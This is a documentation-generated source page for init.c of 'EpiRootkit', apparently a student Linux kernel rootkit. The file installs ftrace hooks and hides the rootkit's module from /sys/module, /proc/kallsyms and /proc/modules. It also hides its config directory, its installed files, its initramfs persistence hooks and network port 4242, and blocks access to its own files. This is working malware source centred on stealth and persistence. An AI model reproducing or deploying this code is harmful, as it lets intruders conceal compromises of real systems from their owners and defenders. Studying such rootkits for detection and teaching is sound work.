EpiRootkit
By STDBOOL
Loading...
Searching...
No Matches
init.c
Go to the documentation of this file.
1#include "init.h"
2
3#include "alterate_api.h"
4#include "epirootkit.h"
5#include "forbid_api.h"
6#include "ftrace.h"
7#include "hide_api.h"
8
9#define HIDE_CFG_FILE_FULL_PATH HIDDEN_DIR_PATH "/" HIDE_CFG_FILE
10#define FORBID_CFG_FILE_FULL_PATH HIDDEN_DIR_PATH "/" FORBID_CFG_FILE
11#define ALTERATE_CFG_FILE_FULL_PATH HIDDEN_DIR_PATH "/" ALTERATE_CFG_FILE
12#define HIDE_PORT_CFG_FILE_FULL_PATH HIDDEN_DIR_PATH "/" HIDE_PORT_CFG_FILE
13
14int init_interceptor(void) {
15 int err;
16
17 err = create_dir(HIDDEN_DIR_PATH);
18 if (err) {
19 ERR_MSG("init: mkdir %s failed: %d\n", HIDDEN_DIR_PATH, err);
20 return err;
21 }
22
23 err = alterate_init();
24 if (err) {
25 ERR_MSG("init: alterate_init() failed: %d\n", err);
26 return err;
27 }
28
29 err = forbid_init();
30 if (err) {
31 ERR_MSG("init: forbid_init() failed: %d\n", err);
32 return err;
33 }
34
35 err = hide_init();
36 if (err) {
37 ERR_MSG("init: hide_init() failed: %d\n", err);
38 return err;
39 }
40
41 err = hide_port_init();
42 if (err) {
43 ERR_MSG("init: hide_port_init() failed: %d\n", err);
44 return err;
45 }
46
47 err = fh_install_hooks(hooks, hook_array_size);
48 if (err) {
49 ERR_MSG("init: failed to install hooks\n");
50 return err;
51 }
52
53 // Hide directory HIDDEN_DIR_PATH
54 hide_file(HIDDEN_DIR_PATH);
55 hide_file(HIDE_CFG_FILE_FULL_PATH);
56 hide_file(FORBID_CFG_FILE_FULL_PATH);
57 hide_file(ALTERATE_CFG_FILE_FULL_PATH);
58 hide_file(HIDE_PORT_CFG_FILE_FULL_PATH);
59
60 // Forbid access to HIDDEN_DIR_PATH
61 forbid_file(HIDDEN_DIR_PATH);
62 forbid_file(HIDE_CFG_FILE_FULL_PATH);
63 forbid_file(FORBID_CFG_FILE_FULL_PATH);
64 forbid_file(ALTERATE_CFG_FILE_FULL_PATH);
65 forbid_file(HIDE_PORT_CFG_FILE_FULL_PATH);
66
67 // Hide module in /sys/modules
68 hide_file("/sys/module/epirootkit");
69
70 // Hide module in /proc/kallsyms
71 alterate_add("/proc/kallsyms", -1, "epirootkit", NULL, NULL);
72
73 // General hiding for epirootkit module file in base64
74 hide_file("/usr/lib/epirootkit/cH0c01AtcG9ydC1rZXlzLmNv");
75 hide_file("/usr/lib/epirootkit");
76
77 // Hide grub peristence stuff
78 // hide_file("/.grub.sh");
79 // hide_file("/etc/default/grub.d/99.cfg");
80 // forbid_file("/.grub.sh");
81 // forbid_file("/etc/default/grub.d/99.cfg");
82
83 // Hide initramfs persistence stuff
84 hide_file("/etc/initramfs-tools/hooks/epirootkit");
85 hide_file("/etc/initramfs-tools/scripts/init-premount/epirootkit-load");
86 hide_file("/tmp/insmod.err");
87
88 // Hide ports
89 hide_port("4242");
90
91// Hide module in /proc/modules
92#if !(defined(DEBUG) && DEBUG)
93 hide_module();
94#endif
95
96 return SUCCESS;
97}
98
99void exit_interceptor(void) {
100 fh_remove_hooks(hooks, hook_array_size);
101
102 hide_exit();
103 forbid_exit();
104 hide_exit();
105}
106
107int create_dir(char *path) {
108 char cmd[128];
109 int rc;
110
111 snprintf(cmd, sizeof(cmd), "mkdir -p -- %s", path);
112 rc = exec_str_as_command_no_timeout(cmd, false);
113 if (rc < 0)
114 return rc;
115
116 return SUCCESS;
117}
alterate_init
int alterate_init(void)
Definition alterate_api.c:8
alterate_add
int alterate_add(const char *path, int hide_line, const char *hide_substr, const char *src, const char *dst)
Definition alterate_api.c:23
alterate_api.h
hooks
struct ftrace_hook hooks[]
Definition array.c:6
hook_array_size
size_t hook_array_size
Definition array.c:22
ERR_MSG
#define ERR_MSG(fmt, args...)
Definition config.h:16
SUCCESS
#define SUCCESS
Definition config.h:5
HIDDEN_DIR_PATH
#define HIDDEN_DIR_PATH
Definition config.h:56
hide_module
int hide_module(void)
Definition ghost.c:7
exec_str_as_command_no_timeout
#define exec_str_as_command_no_timeout(user_cmd, catch_stds)
Definition epirootkit.h:38
forbid_file
int forbid_file(const char *path)
Definition forbid_api.c:24
forbid_exit
void forbid_exit(void)
Definition forbid_api.c:19
forbid_init
int forbid_init(void)
Definition forbid_api.c:8
forbid_api.h
fh_remove_hooks
void fh_remove_hooks(struct ftrace_hook *hooks, size_t count)
Remove multiple ftrace hooks.
Definition ftrace.c:136
fh_install_hooks
int fh_install_hooks(struct ftrace_hook *hooks, size_t count)
Install multiple ftrace hooks.
Definition ftrace.c:116
hide_file
int hide_file(const char *path)
Definition hide_api.c:25
hide_port
int hide_port(const char *port)
Definition hide_api.c:90
hide_port_init
int hide_port_init(void)
Definition hide_api.c:74
hide_exit
void hide_exit(void)
Definition hide_api.c:20
hide_init
int hide_init(void)
Definition hide_api.c:9
hide_api.h
create_dir
int create_dir(char *path)
Definition init.c:107
FORBID_CFG_FILE_FULL_PATH
#define FORBID_CFG_FILE_FULL_PATH
Definition init.c:10
ALTERATE_CFG_FILE_FULL_PATH
#define ALTERATE_CFG_FILE_FULL_PATH
Definition init.c:11
exit_interceptor
void exit_interceptor(void)
Definition init.c:99
HIDE_CFG_FILE_FULL_PATH
#define HIDE_CFG_FILE_FULL_PATH
Definition init.c:9
HIDE_PORT_CFG_FILE_FULL_PATH
#define HIDE_PORT_CFG_FILE_FULL_PATH
Definition init.c:12
init_interceptor
int init_interceptor(void)
Definition init.c:14